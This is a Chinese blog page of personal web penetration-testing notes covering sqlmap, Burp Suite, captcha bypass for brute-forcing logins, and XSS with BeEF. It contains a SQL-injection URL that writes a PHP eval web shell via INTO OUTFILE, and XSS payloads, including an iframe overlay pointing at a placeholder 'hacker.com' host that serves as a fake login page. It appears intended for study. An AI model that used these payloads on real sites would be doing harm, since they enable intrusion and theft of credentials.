sqlmap续

注入语句(知道绝对路径时候可用)

http://192.168.99.171/test2/sqli/example10.php?catid=3’union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php‘--+

检测注入:http://192.168.99.171/test/xinyu2.php若有返回内容则已经写入

form表单

--random-agent 随机请求

--cookie=COOKIE 身份赋予

--technique=TECH    SQL injection techniques to use (default "BEUSTQ")T时间E错误C

--dns-domain=DNS..  Domain name used for DNS exfiltration attack

--DNS域=DNS..用于DNS渗出攻击的域名

burp与wireshark的区别

http协议抓包工具burp,能改能发,实时互动

wireshark不能改只能抓住

burp:

target(目标) proxy(代理) spider scanner intruder repeater sequencer decoder compare extend options

详情:

https://blog.csdn.net/lynnlinlin/article/details77488947/

http://blog.csdn.net/lynnlinlin/article/details/76736972

http://blog.csdn.net/lynnlinlin/article/details/77480726

1) Proxy(代理)

代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,修改代理配置. 在这里我们可以编辑代理正在监听的端口.如果我们不选中"listen on loopback interface only"选项,意味着Burp Proxy可以作为一个网络上其它系统的代理。这意味着在同一网络中的任何计算机都可以使用Burp Proxy功能成为代理,并中继通过它的流量. "support invisible proxying for non-proxy-aware client"选项是用于客户端不知道他们使用的是代理的情况下.这意味着代理设置不是设置在浏览器,有时候设置在hosts文件中.在这种情况下,和将代理选项设置在浏览器本身所不同的是Burp需要知道它是从一个非代理客户端接收流量的."redirect to host"和"redirect to port"选项将客户端重定向到我们在该选项后设置的主机和端口。 这里有个选项用来修改从响应中接收到的html网页。我们可以取消隐藏的表单字段,删除javascript等。还有一个选项用自定义字符串替换掉寻找到的特定的模式.我们需要用指定正则表达式。Burp将解析请求或者响应以期望能够寻找到这种模式,将会用自定义的字符串来替换它.一旦Burp Spider提交一个登陆表单的时候就开始爬行(抓取).它可以自动提交我们提供给它的证书.我们同样可以设置admin/password凭证,设置好之后,他们会做为DVWA中的凭证.因此Burp Spider可以自动提交那些信息凭证,并且保持爬行抓取的状态希望能够获得更多的新的信息.你也可以在thread(线程)项来修改线程数. 这样就会启动Burp Spider,在Spider control标签下我们会看到正在做出的请求,我们也可以为Burp Spider自定义一个范围.

2)Intruder(入侵)

Burp Intruder可以用于利用漏洞,模糊测试,暴力猜解等。在这种情况下我们将使用Burp Suite的Intruder对DVWA进行暴力猜解攻击.浏览到DVWA,单击"Burp Force(暴力猜解)",随便输入username和password,确保Burp Suite上的"intercept is on(监听是打开的)".然后点击登陆 以上的操作会将请求信息发送给intruder功能.进入intruder标签,配置Burp Suite来发起暴力猜解的攻击.在target标签下可以看到已经设置好了要请求攻击的目标 单击右边的"clear"按钮,将会删除所有用不同颜色演示的重要的信息.接下来我们需要配置Burp在这次攻击中只把用户名和密码做为参数.选中本次请求中的username(本例中用户名是指"infosecinstiture")然后单击"Add(添加)".同样的将本次请求中的password也添加进去.这样操作之后,用户名和密码将会成为第一个和第二个参数.一旦你操作完成,输出的样子应该如下图所示: 接下来我们需要设置这次攻击的攻击类型,默认情况下的攻击类型是"Sniper(狙击手)",在本例中,我们将使用"Cluster Bomb(集束炸弹)"的攻击类型.有四种攻击类型,分别是singer,battering ram,pitchfork,cluster bomb.下图中我们看到的我们的攻击类型是"Cluster Bomb' 进入payload标签,确保"payload set"的值是1,点击"load(加载)"加载一个包含用户名的文件 。本例中我们使用一个很小的文件来进行演示.加载之后用户名文件中的用户名会如下图所示 同样设置"payload set"的值为2,点击"load"加载一个密码字典文件。 进入"options"标签,确保results下的"store requests"和"store responses"已经选择.

3)Repeater(中继转发) 通过Burp Repeater功能,我们可以手动修改一个请求,并且发送出去,来分析返回的响应.我们需要从不同的地方发送请求给Burp Repeater,比如入侵者,代理等.发送一个请求给Repeater,只需要单击右键"send to Repeater". 点开Repeater标签,会看到request,也可以看到名为1,2,3的3个标签. 我们也可以看到requestparams,header,hex和raw格式的请求,发送请求之前,我们可以修改其中的任何一个. 只修改Params请求下的username=admin,password=password,点击go,这样就会发送这个请求. 我们可以分析response部分返回的响应.

fuzz(模糊测试)

文件上传

第一个被检测而第二个不被检测

双文件上传

inurl:/ewebeditor.mdbà查找数据库

1.管理员后台

2.整站的rar压缩包(***.rar||***.zip)à代码审计

3.编辑器页面 和编辑器管理员后台à弱口令à文件上传

4.留言板à留言板后台à弱口令à文件上传

5.整站,编辑器,留言板的mdb数据库文件à下载数据库获得用户名密码

6.bak后缀文件(网站源码的备份文件)à拿到网站源码

7.其他攻击者留下的木马à破解密码登录

8.网站安装时留下的说明文件à敏感目录和初始用户名密码

GET POST

GET--》HEAD

index.php登录进去的界面

login.php登录界面

admin/verifycode.php验证代码(丢弃它)

绕过验证码(cookie)(burp)【刷新无效】à爆破登录

  1. 原理:验证码往往是单独的一个请求,如果不让它跳转就一直有效(丢弃验证的)
  2. 过程:
    1. 启动burp和一个打开的登录界面
    2. 在repeater里放弃一个验证的请求
    3. 到了提示密码错误或者用户名错误而不是验证码错误的时候,你就成功了
    4. 然后开始进行用户名密码爆破(用户名可以写一些注入语句)
    5. 比对长度查看与众不同的就是
    6. 注意:速度别太快…数据库会哭死的

脑痛的同源策略(约定判断四要素,cookie)

1.host(域名或ip地址,如果是ip地址则看做一个根域名)

2.子域名

3.端口

4.协议

流动ip

花生壳(动态dns解析)内网穿刺(带你的木马找到回家的路)

以及,FQ…

神奇的xss(精通JavaScript):

1.xss的原理:
脚本会在用户的浏览器上执行,从而达到攻击者的各种目的。

客户端嵌入恶意脚本代码

2.xss类型:

(1)反射型

(2)存储型

(3)本地型(dom型)

1.反射型:(php网页)

(1)恶意的客户端代码(html/javascript),是在服务器端合成的

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

2.本地型(dom型):

DOM:document对象,是在JavaScript当中的一种元素

(1)恶意的客户端代码(html/javascript),是在浏览器端合成的

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

3.存储型:

(1)恶意的客户端代码(html/javascript),存入数据库,或其他持久化形式

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

(3)恶意代码在服务器端合成

beef神器

防beef静止浏览器多次请求,进行360防御-.-

使用详情http://netsecurity.51cto.com/art/201307/402179.htm

BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。

beef beef

假设此时目标192.168.11.1的服务器访问了这个demo页面

http://192.168.11.152:3000/demos/basic.html。则就被hook上了,

实施攻击 HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块。 其中,4种颜色分别表示: 该攻击模块可用,且隐蔽性强 该攻击模块可用,但隐蔽性差 该用户模块是否可用还有待验证 该攻击模块不可用

username=[X]

xss:

闭合:

"><script>alert(1)</script>

"/></textarea><script>alert(1)</script>

注意观察网页源码来使其闭合

xss盗取cookie

cookie即为身份,交流的牌牌,有一个其他人的身份你就成了其他人,然后一不小心就浏览到了后台页面

xss注入点:任意的输入位置,有输入,就有xss。

xss语句

<iframe src="http://www.hacker.com/xss/dy.html" height="400" width="100%" scrolling="no" frameborder="0"></iframe>

<iframe src="http://www.hacker.com//xss/login.html" height="100%" width="100%" scrolling="no" frameborder="0" style="position:absolute;top:0;margin:0;padding:0;left:0;

z-index:99999999;"></iframe>

短网址生成

sqlmap续的更多相关文章

  1. ORM查询语言(OQL)简介--高级篇(续):庐山真貌

    相关文章内容索引: ORM查询语言(OQL)简介--概念篇 ORM查询语言(OQL)简介--实例篇 ORM查询语言(OQL)简介--高级篇:脱胎换骨 ORM查询语言(OQL)简介--高级篇(续):庐山 ...

  2. .Net Core MVC 网站开发(Ninesky) 2.3、项目架构调整(续)-使用配置文件动态注入

    上次实现了依赖注入,但是web项目必须要引用业务逻辑层和数据存储层的实现,项目解耦并不完全:另一方面,要同时注入业务逻辑层和数据访问层,注入的服务直接写在Startup中显得非常臃肿.理想的方式是,w ...

  3. [.NET] C# 知识回顾 - 委托 delegate (续)

    C# 知识回顾 - 委托 delegate (续) [博主]反骨仔 [原文]http://www.cnblogs.com/liqingwen/p/6046171.html 序 上篇<C# 知识回 ...

  4. 关于sqlmap的使用

    好记性不如烂笔头,记录一下. 带cookie的注入 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="coo ...

  5. iOS 开发者账号到期续费流程

    1.登录developer.apple.com,查看到期时间 2.到期提醒通知,点击Renew Membership续费(一般提前一个月提醒续费) 3.个人开发者账号续费需要支付 688人民币/年(9 ...

  6. SQLMap Tamper Scripts Update 04/July/2016

    SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ...

  7. 定制sqlmap tamper脚本

    前言 渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了. 测试 在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接 ...

  8. sqlmap --dns-domain模拟实践

    因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入 ...

  9. 微信公众号开发系列教程一(调试环境部署续:vs远程调试)

    http://www.cnblogs.com/zskbll/p/4080328.html 目录 C#微信公众号开发系列教程一(调试环境部署) C#微信公众号开发系列教程一(调试环境部署续:vs远程调试 ...

随机推荐

  1. 使用LinkedList模拟一个堆栈或者队列数据结构。

    堆栈:先进后出 First in last out filo 队列:先进先出 First in last out filo使用LinkedList的方法,addFirst addLast getFir ...

  2. EasyTransaction主要源码分析

    EasyTransaction是一个全功能的分布式事务框架,以下特性摘抄自其首页:https://github.com/QNJR-GROUP/EasyTransaction 一个框架包含多种事务形态, ...

  3. MySQL 事务嵌套

    MySQL默认自动提交(autocommit=1),如果要开启事务,先关闭自动提交(autocommit=0): InnoDB支持事务,MyISAM不支持: MySQL不支持事务嵌套:已经开启事务后, ...

  4. 基于maven的项目脚手架,一键创建项目的项目模板

    制作基于maven的项目脚手架 Springboot的出现极大的简化了项目开发的配置,然而,到真实使用的时候还是会有一堆配置需要设定.比如依赖管理,各种插件,质量扫描配置,docker配置,持续集成配 ...

  5. WebService跨域配置、Ajax跨域请求、附开发过程源码

    项目开发过程中需要和其他公司的数据对接,当时我们公司提供的是WebService,本地测试,都是好的,Ajax跨域请求,就报错,配置WebService过程中,花了不少功夫,入不少坑,不过最终问题还是 ...

  6. Java NIO 学习笔记(五)----路径、文件和管道 Path/Files/Pipe

    目录: Java NIO 学习笔记(一)----概述,Channel/Buffer Java NIO 学习笔记(二)----聚集和分散,通道到通道 Java NIO 学习笔记(三)----Select ...

  7. NumPy基础操作

    NumPy基础操作(1) (注:记得在文件开头导入import numpy as np) 目录: 数组的创建 强制类型转换与切片 布尔型索引 结语 数组的创建 相关函数 np.array(), np. ...

  8. HDU 4059:The Boss on Mars(数学公式+容斥原理)

    http://acm.hdu.edu.cn/showproblem.php?pid=4059 题意:给出一个n,求1~n里面与n互质的数的四次方的和是多少. 思路:不知道1~n的每个数的四次方的求和公 ...

  9. kuangbin专题 专题一 简单搜索 Find a way HDU - 2612

    题目链接:https://vjudge.net/problem/HDU-2612 题意:‘@’表示KTV,‘#’表示无法走的地方,‘Y’,'M’表示两个人,他们要在KTV见面,问他们都到达KTV要花费 ...

  10. springboot项目快速搭建

    1. 问题描述 springboot的面世,成为Java开发者的一大福音,大大提升了开发的效率,其实springboot只是在maven的基础上,对已有的maven gav进行了封装而已,今天用最简单 ...